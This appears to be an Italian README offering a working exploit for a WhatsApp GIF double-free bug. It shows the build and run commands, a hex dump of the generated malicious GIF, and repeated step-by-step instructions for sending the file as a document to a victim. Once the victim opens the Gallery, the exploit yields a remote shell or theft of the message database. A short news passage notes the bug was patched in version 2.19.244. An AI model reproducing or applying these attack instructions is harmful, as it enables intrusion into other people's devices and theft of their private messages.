
Programma per hackerare WhatsApp tramite GIF, facendo un exploit con la porta.
L'indirizzo di sistema () e il gadget devono essere sostituiti con l'indirizzo reale trovato tramite una vulnerabilità di divulgazione di informazioni.
Dopo aver sostituito l'indirizzo di sistema () e il gadget. Eseguire il codice per generare il file GIF dannoso:
notroot@osboxes:~/Desktop/gif$ make
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit exploit.gif
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B
Successivamente, copia il file exploit.gif e invialo come Documento con WhatsApp a un altro utente di WhatsApp. Tieni presente che non deve essere inviato come file multimediale, altrimenti WhatsApp tenterà di convertirlo in un MP4 prima di inviarlo. Una volta che l'utente riceve il file GIF dannoso, non accadrà nulla finché l'utente non apre la Galleria di WhatsApp per inviare un file multimediale al suo amico.
#Istruzioni
Vettori d'attacco GIF di WhatsApp (Mini notizia e Istruzioni alla fine)
-----Mini Notizia e ISTRUZIONI----
L'attacco GIF di WhatsApp può essere eseguito in due modi
Fase di privilegio locale (da un'applicazione utente a WhatsApp): viene installata un'applicazione dannosa sul dispositivo Android. L'applicazione raccoglie gli indirizzi delle librerie zygote e crea un file GIF dannoso che provoca l'esecuzione di codice in WhatsApp. Ciò consente all'applicazione malware di rubare file dalla sandbox di WhatsApp, incluso il database dei messaggi. Esecuzione remota di codice: abbinamento con un'applicazione che presenta una vulnerabilità di divulgazione di informazioni di memoria remota. L'attaccante può raccogliere gli indirizzi delle librerie zygote e creare un file GIF dannoso da inviare all'utente tramite WhatsApp (deve essere come allegato, non come immagine tramite Gallery Picker poiché WhatsApp tenta di convertire i file multimediali in MP4 e ciò renderebbe inutile il GIF dannoso). Non appena l'utente apre la vista Galleria in WhatsApp, il file GIF attiverà una shell remota nel contesto di WhatsApp. Da leggere: 4 Hack di Fitbit che non hai mai conosciuto prima WhatsApp sull'ultimo Android è hackerabile Le versioni Android 8.1 e 9.0 sono sfruttabili, mentre le versioni precedenti no. Il ricercatore afferma che il bug double-free potrebbe ancora essere attivato in versioni precedenti del sistema operativo, ma si verifica un crash prima che possa essere eseguito codice dannoso per attuare un RCE. GIF dannoso che hackerà WhatsApp Conclusione: Facebook ha riconosciuto il problema di sicurezza e lo ha risolto in WhatsApp versione 2.19.244. Sebbene Facebook abbia cercato di far sembrare che non sia un grande exploit, in realtà è piuttosto sgradevole. Come sempre, mantenete le vostre applicazioni aggiornate e non installate applicazioni inutili.
--------------------------------------------------------Passaggi---------------------------------------------------------------------------
Basta compilare il codice in questo repository. L'indirizzo di sistema () e il gadget devono essere sostituiti con l'indirizzo reale,trovato tramite una vulnerabilità di divulgazione di informazioni che dovete scoprire da soli utilizzando,altre tecniche prima che il GIF esegua qualsiasi RCE per voi.Una volta compilato il codice menzionato nel link precedente, copiate il contenuto in un file GIF e inviatelo come Documento con WhatsApp a un altro utente di WhatsApp. Ricordate di non inviarlo come file multimediale, altrimenti WhatsApp tenterà di convertirlo in un MP4 prima di inviarlo. Una volta che l'utente riceve il file GIF dannoso, non accadrà nulla finché l'utente non apre la Galleria di WhatsApp per inviare un file multimediale al suo amico.